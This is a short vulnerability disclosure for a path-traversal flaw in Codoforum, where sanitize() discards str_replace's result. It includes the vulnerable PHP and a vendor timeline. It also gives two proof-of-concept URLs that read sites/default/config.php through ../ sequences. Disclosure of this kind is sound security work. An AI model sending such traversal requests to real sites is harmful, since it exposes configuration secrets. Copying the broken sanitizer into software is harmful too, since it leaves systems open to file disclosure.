str_replace()
is used to sanitize file path but function output is not assigned to variable. So instead:
private function sanitize($name) {
$name = str_replace("..", "", $name);
$name = str_replace("%2e%2e", "", $name);
return $name;
}
in code we have:
private function sanitize($name) {
str_replace("..", "", $name);
str_replace("%2e%2e", "", $name);
return $name;
}
So $_GET['path']
is not escaped properly.
File: codoforum\sys\Controller\serve.php
public function attachment() {
$name = $this->sanitize($_GET['path']);
$dir = DATA_PATH . 'assets/img/attachments/';
$this->set_headers($name, $dir);
}
public function smiley() {
$name = $this->sanitize($_GET['path']);
$dir = DATA_PATH . 'assets/img/smileys/';
$this->set_headers($name, $dir);
}
Proof of Concept
http://codoforum-url/index.php?u=serve/attachment&path=../../../../../sites/default/config.php
or
http://codoforum-url/index.php?u=serve/smiley&path=../../../../../sites/default/config.php
Timeline
- 23-11-2014: Discovered
- 23-11-2014: Vendor notified
- 03-12-2014: Issue resolved